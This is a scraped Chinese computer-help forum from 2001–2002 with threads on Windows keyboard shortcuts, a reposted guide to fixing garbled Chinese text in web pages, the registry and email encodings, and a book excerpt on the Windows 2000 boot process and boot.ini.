来自：hebei
注册：2001-09-29
 发表于 2001-12-12 11:03:22 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
谢了！
不过，这好像是我的第一百贴了。

UFO Bulletin Board ====> 不明飞行物
赵鹏

初级用户
积分：9
发帖：1196
来自：福建福州
注册：2001-04-02
 发表于 2001-12-15 23:54:09 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
Win D
显示桌面

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
edisonsce

初级用户
积分：0
发帖：1
来自：
注册：2001-12-16
 发表于 2001-12-16 14:28:49 按此观看edisonsce的个人资料 按此发邮件给edisonsce edisonsce 的 oicq 是37533048,查看 37533048 的资料 发送悄悄话给edisonsce 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看edisonsce的IP
挺好的，

我来到这个世界只为等待与你的相逢每每心存希望守侯一生却一次又一次的枉费了轮回
sony

终级用户
积分：1222
发帖：329
来自：浙江省
注册：2001-10-05
 发表于 2002-01-17 20:42:02 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP
可不可以自定义?

许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
51windows

海娃
积分：4495
发帖：1308
来自：湖南－山东
注册：2001-12-02
 发表于 2002-01-18 08:54:50 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
sony在上个帖子中说
引用:
可不可以自定义?

在开始菜单中的快捷方式属性中/有个快捷键/输入一个字母或数字，上面会显示ctrl+alt+*,用起来比较好，不好有时候也出现不能用的情况，

为windows的画图做一个快捷方式，这个能很多的用alt+print Screen sysRq键来抓图了！

http://www.blueidea.com/bbs/NewsDetail.asp?id=352362

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

janlay

终级用户
积分：1028
发帖：267
来自：武汉
注册：2001-02-10
 发表于 2002-01-26 20:55:08 按此观看janlay的个人资料 按此发邮件给janlay 访问janlay的主页 janlay 的 oicq 是629489,查看 629489 的资料 发送悄悄话给janlay 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看janlay的IP
在我的电脑中选中文件夹，按Shift+Enter, 以资源管理器打开这个文件夹（增加了文件夹视图）

人面上难分好坏，只要它对你我没有伤害。
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-08 09:29:02 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
另一个工具 winkey 可以实现自定义

另外我加两个 比较使用的 快捷键

一键关机

在桌面的空白处单击鼠标右键，并且新建立一个“快捷方式”，在弹出的创建快捷方式对话窗口中，在“命令行”中输入“RUNDLL32.EXE user,ExitWindows”，然后单击“下一步”按钮，给该快捷方式命名为“一键关机”，这时系统的桌面上就会出现刚才建立的快捷方式了，打开该快捷方式的属性窗口，进入“快捷方式”页，并且给该快捷方式自定义一个快捷功能键，如F11，完成以后，就可以按F11键执行关机命令了。

一键重启

在桌面的空白处单击鼠标右键，并且新建立一个“快捷方式”，在弹出的创建快捷方式对话窗口中，在“命令行”中输入“rundll.exe usre.exe, exitwindowsexec”，然后单击“下一步”按钮，给该快捷方式命名为“一键重启”，这时系统的桌面上就会出现刚才建立的快捷方式了，打开该快捷方式的属性窗口，进入“快捷方式”页，并且给该快捷方式自定义一个快捷功能键，如F12，完成以后，就可以按F12键执行关机命令了。

上一贴 | 下一贴
快速回复 主题：Windows快捷键大全（转）
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


平定汉字乱码（转） - 经 典 论 坛

计算机技术
平定汉字乱码（转）

上一贴 | 下一贴
发表人 主题: 平定汉字乱码（转）
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-01-30 08:49:20 按此观看啸的个人资料 按此发邮件给啸 收藏该主题供以后查看 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
引自： http://go4.163.com/rayboy/sofeware/wincoad.htm

引用:

我们在使用电脑时，经常会遇到乱码：例如登上港台网站时会看到乱码，打开E-mail时也会看到乱码，更为严重的是原先显示正常的Win9X/Win2K桌面、菜单中汉字一夜之间“面目全非”，本来显示正常的各种应用程序（包括游戏）中汉字也成了乱码！乱码给我们带来了太多的烦恼，告别乱码是我们共同的愿望！
一、汉字乱码现象的分类
汉字乱码现象大致可分成四类：网页、文本、文档和文件乱码。第一类是由于港台的繁体中文大五码（BIG5）与大陆简体中文（GB2312）不通用造成的；第二类是Win9X/Win2K系统（菜单、桌面、提示框）显示乱码，这是Win9X/Win2K注册表中有关字体的部分设置不当引起的；第三类是各种应用程序（包括游戏）本来显示中文的地方出现乱码，形成原因比较复杂，有第二类的乱码原因，也可能是软件用到的中文动态链接库被英文动态链接库覆盖造成的；最后一类是邮件乱码。
二、消除汉字乱码
针对以上几种乱码现象，我们来分类介绍消除乱码的方法。

（一）、网页、文本和文档文件乱码的消除
网页乱码是浏览器（如IE等）对HTML网页解释时形成的。如果在网页的代码中有形如：〈HTML〉〈HEAD〉〈META CONTENT=“text/html；charset=ISO-8859-1”〉〈/HEAD〉……〈/HTML〉的语句，浏览器在显示此页时，就会出现乱码。因为浏览器会将此页语种辨认为“欧洲语系”。解决的办法是将语种“ISO-8859-1”改为GB2312，如果是繁体网页则改为BIG5。
另一种解决办法是不修改网页代码，事先为浏览器安装多语言支持包（例如在安装IE时要安装多语言支持包），这样在浏览网页出现乱码时，就可以在浏览器中选择菜单栏下的“查看”/“编码”/“自动选择”/简体中文（GB2312），如为繁体中文则选择“查看”/“编码”/“自动选择”/繁体中文（BIG5），其它语言依此类推选择相应的语系，这样可消除网页乱码现象。
还有一种解决办法是利用多内码显示平台来转换内码。常用多内码显示平台有：
“南极星”：可自动识别GB码、BIG5码，用简体或繁体显示，并能做到同屏显示GB码和BIG5码，对日文、韩文亦能正确显示。下载地址：http:// www.njstar.com
“四通利方”：支持了包括GB、BIG5、HZ、日韩编码、UNICOD等17种汉字内码，也开始支持预览功能，并且增加了诸如“增删空格”、“插入禁排空格”等小而有用的功能，实在是网友的好帮手。下载地址：http:// www.srsnet.com
“MagicWin 98”：可真正的同屏显示不同内码，即GB码和BIG5码两者共存、都能正常显示。它支持GB、HZ、BIG5、JIS、EUC、SJIS、KSC、UTF7和UTF8等格式；支持Netscape Communicator 4.X、Internet Explorer 和Office 等软件；支持在多个窗口中同时查看不同内码的文档的超级多内码显示平台。下载地址：http:// www.itwin.com.my/magicwin
网页无乱码保存的方法是：用浏览器打开网页时，在“查看”/“编码”中选择“自动选择”，存盘时保存类型选“web页”，编码选择“UNICOD”，这样保存过的网页再次打开时，在浏览器菜单“查看”、“编码”中不管选择简体中文（GB2312）、简体中文（HZ）还是UNICODE（UTF-8）或繁体中文（BIG5），最终显示都不会出现乱码。
文本、文档文件乱码，一般是繁体中文显示在简体中文系统下或者相反情况造成的。只要把原本是繁体的内码转换为简体内码（或者相反），就可消除乱码。
Word2000能胜任这类工作，例如要把繁体中文转换为简体中文，方法是：选择要转换内码的文件，在弹出的对话框中（如图1），选择“其它编码”中的“繁体中文（BIG5）”一项，打开此文件时就不会出现乱码。无乱码保存方法：在保存时选择“文件”中的“另存为”，先存为“Word文档，存盘后打开再存为纯文本等其它格式；您也可以用Word2000的“中文简繁转换”工具实现无乱码保存，方法是在菜单栏中选择“工具/语言/中文简繁转换”，内码转换后再保存。
WPS2000也能转换内码，支持GB2312、BIG5、GBK等三种主要的汉字编码，并可在输出RTF、TXT、HTM格式文件时对内码进行转换。
除此之外，消除这类乱码还可用内码转换工具，对BIG5（繁体中文）和GB2312（国标码、简体中文）进行相互转换来实现。常用的内码转换工具有：
“飓风简繁通”：中文自由软件，纯“绿色软件”，不用安装，把300多K的压缩包解开到硬盘的任意一个目录即可使用。软件支持普通文本、剪贴板上内容、磁盘文件的BIG5→GB或GB→BIG5内码转换，速度很快。该软件特有“网站转换”功能：可在几分钟之内全自动的为您的网站生成一个BIG5码的版本。当然，您什么时候从港台地区抓个网站下来，也可以先来个BIG5→GB的转换，然后轻轻松松慢慢欣赏。下载地址：http://renliang.yeah.net
“内码转换大师”：能够以灵活的方式选取大批文件，同时进行转换。选取的文件在转换前后随时可以直接查看其内容。转换是直接在原文件上进行的，省去了选择目标目录、多次拷贝等繁琐的操作。独家具备：对于HTML文件，能够自动转换其汉字字符集定义，使之在浏览器中浏览时自动按照转换后的代码集中显示。目前支持GB2312以及BIG5两种代码集。下载地址：http://rchan.yeah.net
“华语通”：免费软件，支持BIG5<->GB双向转换，支持文本、Web页、RTF等格式，可批量转换。下载地址：http://lanny.yeah.net
“TEXT ROBOT”：支持BIG5<->GB、BIG5→GBK、BIG5→GBK简体、GBK繁体→GBK简体等多内码转换，可将文本格式转换为Web页，能进行批量内码转换。下载地址：http://denvor.yeah.net
“两岸通汉字内码转换器”：免费软件，支持GB<->BIG5、BIG5<->GB的双向转换，可以批量转换，还可直接转换剪贴板内的文本。在转换文件之前，允许你先通过预览窗口实现预览转换结果。下载地址：http:// www.njstar.com

（二）、Win9X/Win2K系统乱码的消除
这类乱码是由于注册表中关于字体部分配置不正常造成的，即使您用内码翻译软件如四通利方、南极星、Magic Win98、两岸通等处理也不会消除。解决办法是：恢复注册表中关于字体部分设置。
如有一台Win9X/Win2K版本相同且显示正常的机器，则可依下列步骤进行恢复：
1.在正常机器上选择“开始”/“运行”，在对话框中键入“REGEDIT”，打开注册表编辑器；
2.光标定位到“HKEY_LOCAL_MACHINE\ SYSTEM\CURRENT CONTROL SET\CONTROL\ FONTASSOC”，选择“注册表/导出注册表文件”，再选择“分支”，导出该分支注册表信息到文件（如LI.REG）中（如图2）；
3.把LI.REG文件Copy到显示乱码的机器上，在显示乱码机器上运行REGEDIT，选择“注册注册表”/“导入注册注册表”，把LI.REG文件导入注册表中。
如没有Win9X/Win2K版本相同且显示正常的机器，则需要您手工恢复字体部分注册表项，按以下步骤：
1.在乱码机器上打开REGEDIT（REGEDIT.EXE在WINDOWS目录下）；
2.找到“HKEY_LOCAL_MACHINE\SYSTEM\ CURRENT CONTROL SET\CONTROL\FONTASSOC”，正常情况下，会有ASSOCIATED DEFAULTFONTS、ASSOCIATED CHARSET两个文件夹，其正确的内容为：
子目录内容
中文Win98
中文Win98（OEM版）
中文Win2K
AASOCIATED CHARSET
ANSI（00）=“yes”
GB2312（86）=“yes”
DEN（FF）=“yes”
SYMBOL（02）=“no”
ANSI（00）=“yes”
GB2312（86）=“yes”
OEM（FF）=“yes”
SYMBOL（02）=“no”
ANSI（00）=“yes”
OEM（FF）=“yes”
SYMBOL（02）=“no”
ASSOCIATED DEFAULT
FONTS
AssocSystemFont=“simsun.ttf”
FontPackageDecorative=“宋体”
FontPackageDontcare=“宋体”
FontPackageModern=“宋体”
FontPackageRoman=“宋体”
FontPackageScript=“宋体”
FontPackageSwiss=“宋体”
同左栏
AssocSystemFont=“simsun.ttf”
FontPackage=“新宋体”
FontPackageDecorative=“新宋体”
FontPackageDontcare=“新宋体”
FontPackageModern=“新宋体”
FontPackageRoman=“新宋体”
FontPackageScript=“新宋体”
FontPackageSwiss=“新宋体”
3.当出现汉字乱码时，上述两个文件夹中内容就会不完整，有的没有ASSOCIATED CHARSET文件夹或其中内容残缺不全；有的ASSOCIATED DEFAULTFONTS下内容残缺。只要用REGEDIT在“HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\ CONTROL\FONTASSOC”下，根据以上正确内容恢复即可。

（三）、应用程序（包括游戏）乱码的消除
中文软件菜单等显示界面上出现乱码，可能是由于Windows注册表中关于字体设置的信息不正确地改变而造成的，这时候可以用上述第2点介绍的办法去解决。
如果用上法解决不了，那就是因为软件的中文链接库被英文链接库覆盖而引起的，这种现象经常发生在用微软开发工具例如VB、VC开发的中文软件上，这类软件中，菜单等显示界面上的汉字都是受一个动态链接库（DLL文件）控制，而软件的这个动态链接库一般安装在Windows的System目录下，如果以后安装了某个英文软件也使用同名的动态链接库，则英文软件的动态链接库就会覆盖WINDOWS\SYSTEM下的中文软件的动态链接库，这样，运行中文软件时就会调用英文的动态链接库，因此出现乱码。解决办法是重新安装中文软件，恢复中文动态链接库即可。

（四）、邮件乱码的消除
1.邮件乱码原因及其排除
邮件乱码的形成原因很多，主要有以下几个方面：
（1）邮件服务器不支持8位（非ASCII码格式）
传输邮件传输机制或邮件编码的不同，可能造成邮件服务器不支持8位（非ASCII码格式）传输而形成邮件乱码。例如直接发送中文或二进制等非ASCII码格式的邮件（如中文双字节文件、图片文件.jpg、可执行文件.exe或压缩文件.zip等二进制文件）时，邮件服务器有可能无法处理，便把信件中每个字符的第8位都过滤掉，从而造成邮件信息的失真或损坏，在收到邮件时就是一堆乱码。
对策：在发送8位格式的文本文件时，必须事先进行编码，将文件转换为7位ASCII码或更少位数的格式，然后才能保证文件的正确传送。收件人收到7位或更少位格式的邮件后，可以再转换为8位的格式，这样就可避免乱码。
（2）收发端使用的E-mail软件和设置不同
一般E-mail软件的“附件”功能都可以自动对信件先进行编码，然后送出。这样只要收信人使用的E-mail软件（如Outlook、Netscape E-mail等）能区别信件的编码方式，就可以自动将信件解码。然而由于收发件人所用的E-mail软件默认配置不同或收发件人自己定制的一些选项不同，所以在收到编码的信件后，系统不一定能识别出信件所用的编码方法，自然无法自动解码，这样就会出现乱码。
对策：可以用Winzip+IE来解码，方法是：把乱码邮件的内容，拷贝到剪贴板中，然后将其粘贴到记事本中，存为文本文件（例如LI.txt），再将其后缀改为.uue（改为LI.uue），点击此文件，会启动Winzip，然后启动IE，把Winzip中的001.txt文件拖到IE窗口中，就会显示邮件原来的内容，而不会看到乱码。
也可以根据邮件中的关键字符判断编码方法，选取合适的解码软件进行解码。
邮件的编码方式主要有：UUENCODE、Base64 encode、QP－encode、BINHEX等。
UUENCODE：这是UNIX环境下使用的编码方式，目前已经很少用，大体格式为：
begin 644 kk.zip M1G)O;2!I;&EN＋F)B3T!C(VEE＋FYC='4N961U＋G1W(%=E9"!.;W8@(#8@,3(ZM,SDZ,C4@,3DY－@I296－E:79E9#H@9G)O;2!F;&%B;6%I;"YF;&%B＋F9U:FET……
end
特征：乱码前面含有“begin xxx”，后面是编码前的原始文件名（如kk.zip），接着是已经过编码的信件内容（如上述的乱码部分）最后一行为“end”。
解码办法：可用BECKY！EUDORA等E-mail软件，选择编码中相应的选项就可解码，也可以在E-mail软件中保存乱码邮件，存为后缀为“.UUE”格式的文件，然后用Winzip解码展开。解码后就会消除乱码。
MIME/BASE64 encode：该编码方式将3个字节（8位）用4个字节（6位）表示，由于编码后的内容是6位的，因此可避免第8位被截掉，大体格式为：
MIME－Version：1.0
Content－Type：text/plain; charset="us－ascii"
Content－Transfer－Encoding:base64
Status：R
SGmhQbF6pm6hSafapmK69Lj0pFexb6q＋sXqsT6Skp OWrSKXzsN3DRLFNrmGhQQ0Kq1＋sTqq6vdCx<BR>0LF6tFit07Ddw0ShRw0KD QqtuqX9p2m2RLF6p9qoz6XOIE 1Py3Jvc29mdCuiBJbnRlcm5ldCBN……
特征：乱码前一般有如下几部分“信头”：Content－Type(内容类型)、charset(字符集)和Content－Transfer－Encoding(内容传输乱码方式)。
解码办法：用E-mail软件，选择编码中Base64 选项就可解码，解码后会消除乱码。
QpencodeQP：全称“Quoted－Printable Content－Transfer－Encoding”。因为这种格式邮件的内容都是ASCII字符集中可以打印的字符，所以名称中含有Printable。大体格式为：
=A1A=B1z=A6n=A1I=A7=DA=A6b=BA=F4=B8=F4=A4W
=B1o......
=E5==ABH=A5=F3=B0=DD=C3D=B1M=Aea=A1A......
特征：内容通常有很多等号“=”，因此不需要看“信头”也可以判断是否为QP编码。
解码办法：把邮件中类似A1A=B1z=A6n...的部分编码全部复制下来，贴到一个新的纯文本文件中，然后在文件头部加入Quoted-Pintable格式的文件头：
Contenet-Type:text/plain;Charset="GB2312"
Content-Transfer-Encoding;Quoted-Pintable
然后以“EML”为后缀保存文件，用资源管理器双击打开文件即可显示正确的内容。如果还有部分汉字乱码，可以用Winzip对存盘后的EML文件进行解压，即可看到正确的内容。
BINHEX：这种编码方式大体格式为：
(This file must be converted with Binhex4.0)
SGmhQbF6pm6hSafapmK69Lj0pFexb6qssTqq6vdCx<BR> 0LF6tFit07Ddw0ShRw0KDQqtuqX9p2m2RLF6p9q
oz6XOIE……
解码办法：用E-mail软件对它解码；也可在E-mail软件中保存乱码邮件，存为后缀为“.HQX”格式的文件，然后用Winzip解码展开。
解码后会消除乱码。
UTIF-7/UTIF-8：它们是UNICODE的两种转换码。
UTIF-7编码方式大体格式为：
+SGmhQbF/6pm6hSafapmK69L/j0pFexb6q＋sXqsT6Skp. OWrSKXzsN3DRLFNrmGhQQ0Kq1－sTqq6vdCx<BR>0LF6tFit07Ddw0ShRw0KD QqtuqX9p2m2RLF6p9qoz6XOIE 1Py3Jvc29mdCuiBJbnRlcm5ldCBN……
解码办法：在原E-mail头加入以下信息：
MIME－Version：1.0
Content－Type：text/plain; charset="utf-7"
Content－Transfer－Encoding:7bit
插入后与字符留一空行，将邮件存为“EML”后缀，然后用Outlook即可解码，消除乱码。
UTIF-8
解码办法：在原E-mail头加入以下信息：
MIME－Version：1.0
Content－Type：text/plain; charset="utf-8"
Content－Transfer－Encoding:8bit
将邮件存为“EML”后缀，然后用Outlook即可解码，消除乱码。
（3）操作系统语种不同
对于中文电子邮件，如果收信方所用的操作系统是英文环境而且没有外挂中文系统或未切换为中文（如四通利方或南极星等）编码方式，也会无法看到中文只见乱码。所有的双字节字符（如中文简/繁体的GB和BIG5码及日文的JIS、EUC和朝鲜文的 KSC码等）在非本语种操作系统下都会出现乱码。同样在中文简体的GB码环境下看其它双字节字符时也只能看到乱码。
对策：安装多语言支持包或使用多内码显示平台（如四通利方或南极星等），对收到的邮件，根据其使用的语种切换到相应的编码方式即可消除乱码。
2.为了避免别人收到乱码，发信方应注意：
（1） E-mail软件中的正确设置
使用英文E-mail软件应设置成：
文字设定Default CHARSET：ISO 8859-1
（Latin1）
编码方式Encoding：Quoted-Printable，不可选择7位（因为7位不支持中文）
字码页Code Page（可选）：936或HZ-GB-2312，
以支持整字识别邮件格式：MIME
字体：宋体
中文E-mail软件应设置成：
文字设定Default CHARSET：简体中文GB2312
编码方式Encoding：Quoted-Printable邮件格式：MIME
字体：宋体
Outlook Express中应把“简体中文（GB2312）作为默认的邮件使用语言，选择“国际设置”/为接收的所有邮件使用默认的编码。
（2）发送前将邮件按7位格式重新编码
在发送8位格式的文本文件时，必须事先进行编码，将文件转换为7位ASCII码或更少位数的格式，然后才能保证文件的正确传送。收件人收到7位或更少位格式的邮件之后，可以再转换为8位的格式，这样就可以阅读了。
在邮件客户端软件中的书写（撰写）选项中，设定默认自动为7位编码。
（3）转换成合适的内码
在E-mail软件的书写（撰写）选项中，设定默认自动为7位编码。对用汉字系统编辑的中文邮件在发送前，最好在固定的签字栏中注明自己所使用的汉字码标准(如：GB2312、中文HZ、GBK)；港澳台及东南亚地区邮件作者在使用BIG5码撰写完邮件、向内地发送前要转换成上述三种简体国标码中的一种形式并在签字栏中注明。如不转换则可能无法阅读，因为国内用户使用的邮件系统有很多不支持BIG5码。
（4）发送重要信息时先发测试信
发送重要信息时，为了确认是否无须编码即可发送正文，应该先发送测试信。而且还应确定收件人能否对附件文件进行解码。如果发送已经编码的邮件，则最好添加足够的“信头”信息，以便收件人知道所需的解码方法。建议对UUENCODE/UUDeview编码方式用UUENCODING作信头，对Mpack编码方式用Base64 encoding作信头。
（5）尽量利用“附件”功能发送文件
几乎所有的邮件软件，如Netscape、The Bat!、 Becky! 等邮件系统附加这类非标准 ASCII码格式的文件时，附加文件通常可以自动进行“Base64”方式编码（仅对附件部分进行编码）。在用“附件”方式发送邮件之前，无需进行编码；否则适得其反。因为邮件软件能够自动成功解码这类“附加”文件，因此在发送中文类邮件时应该首选这种方法。
如果无法以附件方式发送文件，则必须在正文中发送中文或二进制文件如果发/收件人之间远隔万里，则传送过程中，第八位将可能被截掉。这时最好先在正文中用中文给收件人发一封测试信，并了解对方能否正确收到邮件正文。如果第八位被截掉，则收件人将会看到一些乱码，而不是上述的uu/b64/Qp等格式，而且这种信件几乎不可恢复。
对策：在Netscape、Eudora或Pegasus Mail等你所使用的邮件系统中，选择其首选项或选项配置中的“Quoted Printalbe”或“MIME encoding”。
（6）选择优秀的客户端邮件软件
选择优秀E-mail收发软件可有效解决邮件乱码。
3.为排除乱码，收信方应注意：
查找邮件：签字栏或正文中有无指明本邮件所使用汉字标准码类别的英文字符；在“查看(V)”下拉菜单中选中“语言”，随后出现的菜单中会包括本系统所能支持的全部汉字标准，在其中单击邮件中所指明的一种。如果收到的邮件中没有指明其所使用的汉字标准，则只可按顺序单击，直到邮件正文显示正确为止（数个汉字标准中必有一个前面有“.”标记，此即您编辑器所用的汉字标准）。若使用的是Netscape,可在Option菜单的Document Encode中选择相应的项目。
4.在非中文平台上中文邮件不出现乱码方法
当对方没有中文平台而打开您发的中文邮件时，就会出现乱码。解决办法有两种：
（1）用E-mail AID之类的工具
UCWIN GOLD 1.0附带的工具E-mail AID可把文本文件转换为AID格式文件，大小只比原TXT文件增加几K。写好中文邮件后，用文本格式存盘，然后用E-mail AID以AID格式保存，最后把此文件连同E-mail AID一起作为附件插在信中。对方收到信后，只需运行E-mail AID打开AID格式文件即可看到汉字，不管对方在何语言平台下，都不会出现乱码。
（2）把中文邮件以图形格式保存
用画笔等绘图软件书写中文邮件，在图片中输入文字，用默认的BMP格式保存，将属性置为黑白模式（以减少BMP图片体积），然后用Winzip把它压缩成ZIP格式，作为附件在邮件中发送，这样不管对方在何语言平台下，都不会出现乱码。这种方法的缺点是生成的BMP中文邮件体积太大。

作者: 李红

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

len

SlowHorse
积分：1198
发帖：572
来自：hebei
注册：2001-09-29
 发表于 2002-01-30 09:13:27 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
我收邮件时经常遇到乱码,这篇文章很有用哟.

UFO Bulletin Board ====> 不明飞行物
天啦！

高级用户
积分：185
发帖：48
来自：南京，江苏，中国
注册：2001-12-06
 发表于 2002-01-30 11:07:41 按此观看天啦！的个人资料 按此发邮件给天啦！ 天啦！ 的 oicq 是265135,查看 265135 的资料 发送悄悄话给天啦！ 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天啦！的IP
实用！已经保存下来慢慢研究！

[img]照片[/img]
上一贴 | 下一贴
快速回复 主题：平定汉字乱码（转）
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


深入了解Win2000 引导与启动 （转） - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
深入了解Win2000 引导与启动 （转）

上一贴 | 下一贴
发表人 主题: 深入了解Win2000 引导与启动 （转）
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-06 22:24:43 按此观看啸的个人资料 按此发邮件给啸 收藏该主题供以后查看 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
在一本书的电子版上看到的，书名是《Windows2000》，觉得挺有用，就从中摘录一点下来，供大家参考。可能内容有点枯燥，请做好心里准备

共摘抄了六部分，分别是：
一、 引导过程
二、 关于boot.ini
三、 高级选项菜单
四、 创建引导软盘
五、 创建和使用紧急修复盘（ERD）
六、 故障恢复控制台

大家可以按顺序看，也可以挑些感兴趣的看，虽说是讲2000的，但里面很多内容也适合XP.

计算机实际上有两个引导过程。首先是它本身的引导，然后是操作系统的引导。如果你将
计算机配置成双重引导，那么就可选择要引导的操作系统。当发生故障，或全部引导都失败时，
如果你事先做好了准备，就可以解决操作系统引导时出现的紧急情况。这里介绍了操作系统的
引导过程，同时介绍了与准备和排除故障有关的内容。

一、 引导过程

在安装过程中， Windows 2000的安装程序将数据写入计算机主分区（引导分区）的第一个
扇区中。这些数据就是“主引导记录（ M B R）”，它包含了X 8 6计算机可执行的指令。除了可执
行指令外， M B R还有一个最多包含4个项目的表，它定义主分区在磁盘上的位置。安装程序还把
两个初始化Windows 2000引导序列的文件（ N t l d r和N t d e t e c t . c o m）复制到引导驱动器的根目录
下。同时，文件b o o t . i n i也放置在了引导驱动器的根目录下，该文件包含了启动选项。
注意如果Windows 2000要使用的引导扇区是以前由DOS格式化的（Windows 9x和DOS一
样），Windows 2000安装程序就会将引导扇区的现有内容复制到一个名为b o o t s e c t . d o s的文
件中，并把它放在引导驱动器的根目录下。

5.1.1 MBR代码执行

在B I O S引导过程的最后一步，计算机将M B R读入内存，然后将控制交给M B R。可执行代码
在分区上搜索分区表，查找一个标识了可引导标记的分区。找到第一个可引导分区后，它会读
取该分区的第一个扇区，这就是引导扇区。
Windows 2000的启动文件位于系统分区上，操作系统文件位于引导分区上，对这两种分区
的说明如下：
. 系统分区包含引导Windows 2000所需要的硬件规格文件，包括M B R。在X 8 6计算机中，这
个分区必须是标记为活动的（ a c t i v e）主分区。它始终是驱动器0，因为它是B I O S将要访问
并把引导进程交给其M B R的驱动器。
. 引导分区包含了操作系统文件，% S y s t e m R o o t %目录。支持文件（%SystemRoot%\ System）
也必须位于引导分区。

提示 没有必要使系统分区和引导分区是同一个分区，虽然这是一种常见的做法。

......

[这消息被啸编辑过(编辑时间2002-02-07 20:29:12)]
[这消息被啸编辑过(编辑时间2002-02-19 14:02:26)]

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-06 22:25:59 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
二、 关于boot.ini

屏幕菜单的内容由b o o t . i n i确定。但是b o o t . i n i的作用不仅仅是为用户提供菜单选项。这个文
件是控制操作系统引导过程的一个重要机制。
1. Boot.ini的内容
b o o t . i n i是一个包含完成引导过程所需信息的文本文件。用户可在任何文本编辑器中编辑它
（这个文件是只读和隐藏的，所以你必须在保存编辑结果之前更改它的属性——编辑完后，不要
忘记将属性还原）。
象任何. i n i文件一样，文件的每一节都由方括号内的一个节标题开始。文件中的信息是在操
作系统安装过程中创建的，所以它是针对计算机。文件有两节：
. [boot loader]
. [operating systems]
[boot loader]节包含了超时规定和操作系统的默认路径。超时规定是一个时间量，以秒计。
在这个规定的时间里，用户可在屏幕上做出对操作系统的选择。默认情况下，超时时间是3 0秒，
用户可在屏幕上看到倒计数秒，一直到0。如果用户在这段时间内没有做出选择，默认的操作系
统就会被加载。
你可以不用编辑b o o t . i n i就更改默认的操作系统和倒计数秒的长度：
1) 在控制面板中打开“系统”小程序（最快的方法是右击“我的电脑”，然后选择“属
性”）。
2) 切换到“高级”选项卡。
3) 单击“启动和故障恢复”，进入更改默认操作系统或菜单在屏幕上显示的时间长度的字段。

警告 如果在boot.ini文件中只有一个操作系统，Windows 2000就不会等指定的时间过去后
再引导它，即使你规定超时时间为30秒、60秒，操作系统会在3秒钟后开始加载。

[operating system]节包含了安装在计算机上的操作系统的路径。在基于X 8 6的计算机上，每
个操作系统的路径都在它自己的行上输入。信息的格式基于“高级R I S C计算（A R C）”规定中的
约定。
用引号括起来的文本串会显示在屏幕上。

2. X86 ARC路径语句
在X 8 6计算机上有两种可用的A R C路径：以m u l t i ( )开始的行或以s c s i ( )开始的行。
m u l t i ( A ) d i s k ( B ) r d i s k ( C ) p a r t i t i o n ( D ) \ < % S y s t e m R o o t % >
s c s i ( A ) d i s k ( B ) r d i s k ( C ) p a r t i t i o n ( D ) \ < % S y s t e m R o o t % >
在这里：
. A是适配器的顺序号（第一个适配器是0，它应当是可引导的适配器）。
. B是磁盘参数信息，而且只与s c s i ( )语法一起使用。
. C是连接到适配器上的磁盘的顺序号。
